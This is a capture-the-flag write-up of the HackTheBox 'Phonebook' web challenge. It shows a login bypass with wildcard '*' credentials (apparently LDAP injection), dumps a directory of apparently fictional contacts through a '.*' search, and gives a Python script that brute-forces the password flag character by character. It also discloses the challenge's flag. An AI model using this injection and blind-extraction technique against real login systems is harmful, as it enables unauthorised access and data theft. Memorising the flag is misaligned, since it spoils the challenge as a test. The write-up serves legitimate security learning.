Phonebook

Date: 13, May, 2021

Author: Dhilip Sanjay S


Initial Recon

  • Initially I couldn't find the username and password for login. So, I was looking for someother endpoint other than login.

  • I was able to find two other enpoints:

    • 964430b4cdd199af19b986eaf2193b21f32542d0

    • search

Access Denied

  • The 964430b4cdd199af19b986eaf2193b21f32542d0 page had a search box, which made a POST request to the search endpoint. But it kept on returning Access Denied - 403 Error message.

Dumping all the contacts in the phonebook

Login with wild card character (*)

  • On entering the username and password as a wildcard character (*), I was able to login into the site.

Search using regex (.*)

  • Now in the search box, I tried the same wildcard character, but it didn't work.

  • So, I used the regex that matches any string .*, which gave me the following output:

Kyle Reese	[email protected]	555-1234567
Ellery Hun	[email protected]	317-959-9562
Madelaine Lush	[email protected]	636-918-1006
Currey Conti	[email protected]	529-673-3935
Chaim Smoth	[email protected]	895-974-4117
Eldin Jelf	[email protected]	363-426-3563
Ganny Marti	[email protected]	796-793-6925
Jobey Olley	[email protected]	607-345-0290
Katalin Wilde	[email protected]	414-839-2681
Stinky Trood	[email protected]	933-416-1003
Tab Zoren	[email protected]	360-678-3613
Ursula Beer	[email protected]	794-396-6882
Bryan Arman	[email protected]	640-255-8092
Babette Cunio	[email protected]	709-363-0223
Berget Novis	[email protected]	780-278-2572
Ced Engley	[email protected]	230-780-1999
Caryn Germon	[email protected]	967-789-6335
Devina Alcide	[email protected]	828-947-3484
Dionne Lammas	[email protected]	824-561-5676
Emmalynn Burnup	[email protected]	148-856-7052
Fredericka Hanks	[email protected]	762-337-5667
Hannah Inder	[email protected]	315-711-6454
Jay Sharma	[email protected]	893-382-5236
Lilyan Crepel	[email protected]	851-980-1038
Nevile Cogle	[email protected]	296-328-0254
Pansy Godier	[email protected]	126-853-7977
Rubetta Bernth	[email protected]	897-680-2856
Renelle Hyett	[email protected]	453-475-9693
Saul Haill	[email protected]	654-478-5757
Stephanus Massot	[email protected]	717-500-2025
Sarah Moyes	[email protected]	747-445-4381
Sig Tanby	[email protected]	212-473-4506
Shepherd Tunuy	[email protected]	293-455-5209
Teddy Bilby	[email protected]	357-669-5415
Taylor Capsey	[email protected]	118-956-5884
Teddie Redley	[email protected]	658-361-4791
Abagael Guidera	[email protected]	857-685-9711
Arv Teresse	[email protected]	916-453-1626
Bert Father	[email protected]	131-343-2704
Bart McNess	[email protected]	644-208-9958
Corinne Tirone	[email protected]	572-971-8847
Denny Ashmole	[email protected]	345-974-0984
Elenore Puttick	[email protected]	525-705-9780
Frederigo Itzkov	[email protected]	681-753-0881
Jessamyn Trusty	[email protected]	423-494-9425
Jamison Vigurs	[email protected]	161-478-7335
Michal Fearby	[email protected]	844-581-6099
Mellicent Pessolt	[email protected]	735-651-5726
Terencio Ducarne	[email protected]	831-135-9972
Trev Simmers	[email protected]	378-186-4422
Aubrey Castille	[email protected]	930-681-1706
Andria Gossage	[email protected]	184-389-0446
Ansell Shovlin	[email protected]	329-311-4183
Ahmed Swyndley	[email protected]	954-829-5270
Bay Gregori	[email protected]	791-721-1297
Charlie Prangle	[email protected]	869-131-2435
Dianna Chesser	[email protected]	901-185-5817
Denna Duplain	[email protected]	884-899-2850
Davidson Ibotson	[email protected]	709-535-0126
Enid Halbord	[email protected]	318-313-2200
Eimile Pantlin	[email protected]	690-650-9785
Fina Bonsale	[email protected]	631-592-3171
Ives Harvatt	[email protected]	606-103-7270
Jehanna Langmaid	[email protected]	171-550-7961
Karlee Christal	[email protected]	354-231-8489
Koo Hansill	[email protected]	114-439-3748
Kimberley Mourant	[email protected]	792-338-9852
Moll Linster	[email protected]	704-145-7925
Sabra Brumham	[email protected]	222-509-0396
Scottie Bucknell	[email protected]	765-181-5301
Stewart Currier	[email protected]	480-258-4237
Sollie Windham	[email protected]	554-620-3103
Veda Lalonde	[email protected]	788-911-3962
Aguie Baggaley	[email protected]	302-693-4223
April Roskelly	[email protected]	177-474-9382
Burtie Bitcheno	[email protected]	859-267-0856
Brunhilda Courtier	[email protected]	610-896-4215
Baxie Ellesmere	[email protected]	815-678-4391
Daryl Pond-Jones	[email protected]	807-353-1751
Elyse Puckring	[email protected]	619-569-7695
Glen Pickford	[email protected]	101-639-7455
Issi Coupland	[email protected]	943-625-5169
Joey Stienham	[email protected]	214-853-1445
Marylee Parbrook	[email protected]	872-906-8081
Reginauld Meggison	[email protected]	460-793-0851
Sybille Jephcott	[email protected]	454-950-9923
Siouxie Yesichev	[email protected]	215-132-7221
Diana Moncreiff	[email protected]	473-166-1352
Deane Shakelade	[email protected]	747-399-5336
Far Chansonne	[email protected]	215-579-4465
Ivett Danielczyk	[email protected]	777-574-2837
Johnette Vescovini	[email protected]	470-681-1859
Kary Thackeray	[email protected]	592-635-6851
Maris Giacopelo	[email protected]	721-232-8735
Pascal Ainscough	[email protected]	202-416-7489
Valeda Purselowe	[email protected]	407-245-6246
Allin de Glanville	[email protected]	885-440-5379
Marty Chellenham	[email protected]	713-864-5942
Oneida Della Scala	[email protected]	472-913-8907
Vale O' Concannon	[email protected]	547-901-0162
Xavier Semeradova	[email protected]	487-363-1619
  • But wait, where is the flag??????

Finding the password/flag

  • We'll try to find the password. My intuition is that the password might be the flag.

  • We know that the wildcard character (*) will let us login. So, we can try to append some character before and after the wildcard character (*).

  • So let's try * as the username and HTB{*} as the password, because this the flag format for HTB challenges.

  • Now we are able to login. This confirms that the password is the flag.

  • So we need some script to bruteforce the flag.

#!/usr/bin/env python3
import requests
import string

url = "http://138.68.182.108:30733/login"
leaked_pass = list("HTB{")

# Remove the wildcard character
printable = string.printable.replace('*', '')

while True:
	for character in printable:	
		print("Guessing " + ''.join(leaked_pass) + character + "*")
		r = requests.post(url, {"username":"*", "password": ''.join(leaked_pass) + character + "*"})
		#print(r.headers['Content-Length'])
		if r.headers['Content-Length'] == '2586':
			leaked_pass.append(character)
			break
			
	# End of the flag
	if leaked_pass[-1] == '}':
		exit()

Solution

  • We get the password/flag as: HTB{d1rectory_h4xx0r_is_k00l}

Last updated